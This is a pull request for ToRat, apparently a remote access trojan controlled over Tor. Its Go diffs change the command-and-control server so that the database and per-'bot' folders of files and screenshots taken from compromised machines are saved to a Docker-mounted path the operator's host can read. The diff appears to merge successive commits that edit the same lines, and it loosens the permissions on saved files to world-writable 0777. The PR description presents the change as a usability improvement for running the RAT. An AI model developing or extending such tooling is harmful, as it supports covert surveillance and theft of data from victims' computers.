### PR TITLE
Share Docker file system with host

### DIFF
--- a/torat_server/client_ishell.go
+++ b/torat_server/client_ishell.go
@@ -153,7 +153,7 @@ func (client *activeClient) Download(c *ishell.Context) {
 		return
 	}
 
-	dlPath := filepath.Join("/dist_ext/bots/", client.Client.Hostname, r.Fpath)
+	dlPath := filepath.Join(client.Client.Path, r.Fpath)
 	dlDir, _ := filepath.Split(dlPath)
 
 	if err := os.MkdirAll(dlDir, os.ModePerm); err != nil {
@@ -218,7 +218,7 @@ func (client *activeClient) Screen(c *ishell.Context) {
 		return
 	}
 
-	dlPath := filepath.Join("/dist_ext/bots/", client.Client.Hostname, "/screenshots/", filename)
+	dlPath := filepath.Join(client.Client.Path, "/screenshots/", filename)
 	dlDir, _ := filepath.Split(dlPath)
 
 	if err := os.MkdirAll(dlDir, os.ModePerm); err != nil {

--- a/torat_server/client_ishell.go
+++ b/torat_server/client_ishell.go
@@ -153,7 +153,7 @@ func (client *activeClient) Download(c *ishell.Context) {
 		return
 	}
 
-	dlPath := filepath.Join("/ToRat/cmd/server/bots/", client.Client.Hostname, r.Fpath)
+	dlPath := filepath.Join("/dist_ext/bots/", client.Client.Hostname, r.Fpath)
 	dlDir, _ := filepath.Split(dlPath)
 
 	if err := os.MkdirAll(dlDir, os.ModePerm); err != nil {
@@ -162,7 +162,7 @@ func (client *activeClient) Download(c *ishell.Context) {
 		return
 	}
 
-	if err := ioutil.WriteFile(dlPath, r.Content, 0600); err != nil {
+	if err := ioutil.WriteFile(dlPath, r.Content, 0777); err != nil {
 		c.ProgressBar().Final(green("[Server] ") + red("[!] Download failed to write to path:", err))
 		c.ProgressBar().Stop()
 		return
@@ -218,7 +218,17 @@ func (client *activeClient) Screen(c *ishell.Context) {
 		return
 	}
 
-	err := ioutil.WriteFile(filepath.Join(client.Client.Path, filename), r, 0600)
+	dlPath := filepath.Join("/dist_ext/bots/", client.Client.Hostname, "/screenshots/", filename)
+	dlDir, _ := filepath.Split(dlPath)
+
+	if err := os.MkdirAll(dlDir, os.ModePerm); err != nil {
+		c.ProgressBar().Final(green("[Server] ") + red("[!] Could not create screenshots path!"))
+		c.ProgressBar().Stop()
+		c.Println(green("[Server] ") + red("[!] ", err))
+		return
+	}
+
+	err := ioutil.WriteFile(dlPath, r, 0777)
 	if err != nil {
 		c.ProgressBar().Final(green("[Server] ") + red("[!] Screenshot could not be saved:", err))
 		c.ProgressBar().Stop()
@@ -260,7 +270,9 @@ func (client *activeClient) Speedtest(c *ishell.Context) {
 
 	r := shared.Speedtest{}
 	if err := client.RPC.Call("API.Speedtest", void, &r); err != nil {
-		c.ProgressBar().Final(yellow("["+client.Client.Name+"] ") + red("[!] Could not perform speedtest on client:", err))
+		c.ProgressBar().Final(yellow("["+client.Client.Name+"] ") + red("[!] Could not perform speedtest on client"))
+		c.ProgressBar().Stop()
+		c.Println(yellow("["+client.Client.Name+"] ") + red("[!] ", err))
 		return
 	}
 

--- a/torat_server/server.go
+++ b/torat_server/server.go
@@ -83,12 +83,15 @@ func accept(conn net.Conn) {
 		log.Println("Invalid Hostname:", err)
 		return
 	}
-	c.Client = Client{Hostname: c.Hostname, Path: filepath.Join("bots", c.Hostname)}
+	c.Client = Client{
+		Hostname: c.Hostname,
+		Path:     filepath.Join("/dist_ext/bots", c.Hostname),
+	}
 
 	db.FirstOrCreate(&c.Client, Client{Hostname: c.Hostname})
 
-	if _, err := os.Stat("/dist_ext/bots/" + c.Hostname); err != nil {
-		os.MkdirAll("/dist_ext/bots/"+c.Hostname, os.ModePerm)
+	if _, err := os.Stat(c.Client.Path); err != nil {
+		os.MkdirAll(c.Client.Path, os.ModePerm)
 	}
 	if c.Client.Name == "" {
 		c.Client.Name = c.Client.Hostname

--- a/torat_server/server.go
+++ b/torat_server/server.go
@@ -27,7 +27,7 @@ var activeClients []activeClient
 // Start runs the server
 func Start() error {
 	var err error // this is needed for gorm
-	db, err = gorm.Open(sqlite.Open("ToRat.db"), &gorm.Config{})
+	db, err = gorm.Open(sqlite.Open("/dist_ext/ToRat.db"), &gorm.Config{})
 	if err != nil {
 		log.Fatalln("Could not open db", err)
 	}
@@ -87,8 +87,8 @@ func accept(conn net.Conn) {
 
 	db.FirstOrCreate(&c.Client, Client{Hostname: c.Hostname})
 
-	if _, err := os.Stat(c.Client.Path); err != nil {
-		os.MkdirAll(c.Client.Path, os.ModePerm)
+	if _, err := os.Stat("/dist_ext/bots/" + c.Hostname); err != nil {
+		os.MkdirAll("/dist_ext/bots/"+c.Hostname, os.ModePerm)
 	}
 	if c.Client.Name == "" {
 		c.Client.Name = c.Client.Hostname


### PR DESCRIPTION
This may be the single most helpful QOL PR's I have sent you. I have moved `ToRat.db` and `/bots` to `/dist_ext` for access on the docker bind that happens with `-v "$(pwd)"/dist:/dist_ext`. This means that the host has direct access to not only all the downloads and screenshots taken from clients but also means the SQL DB can be saved easily for transfer to new containers. (Fixes issue #204)

Very excited about this one in terms of improving useability